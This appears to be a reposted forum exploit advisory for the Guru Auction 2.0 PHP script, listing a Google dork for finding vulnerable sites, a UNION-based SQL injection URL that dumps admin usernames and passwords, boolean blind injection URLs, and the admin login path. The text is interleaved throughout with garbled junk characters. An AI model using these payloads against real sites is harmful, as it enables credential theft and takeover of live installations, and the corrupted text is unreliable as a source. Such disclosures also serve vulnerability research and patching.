Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
& `; V9 Q6 a; D( L! Q* v; @, Z8 e; [& n0 C8 V4 j
作者 : v3n0m
9 |9 W5 [8 {$ p4 ]% O+ e$ }应用 : Guru Auction 2.0+ g z. ^2 T' H: s# B3 X
Price : $49! N+ ^* O0 X: D8 V
Vendor : http://www.guruscript.com/4 }: s5 {( n2 D
Google Dork : inurl:subcat.php?cate_id=, |$ L, a0 A3 W4 F: q4 v
! N& l7 H( B2 {* M- g1 z5 x- u7 A3 ^SQLi p0c:3 f- |; Z+ X2 F/ M& J
~~~~~~~~~~ e6 l( @2 R$ S
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
* d# S$ M$ A- |. G 6 h' W6 g& z/ M) P8 h1 _- u
# D: a9 c: @5 U8 x盲注 p0c:
$ X+ k/ ~4 O! L~~~~~~~~~~
9 M& @9 q! v @2 shttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
4 I# ]) l* ]3 S5 f4 N, y& P4 jhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
8 X* }% ~9 N% Z. v4 E + V6 _; o' r9 x, L% G0 W
管理登录入口:
! [5 }% q2 v7 x6 ~: a6 E. u" X~~~~~~~~~~# @# j5 f( @% U9 _- A# f
http://domain.tld/[path]/admin/
' C, `2 Z: \: b: D) z |
发表于 2012-12-31 09:24:05
收藏
支持
反对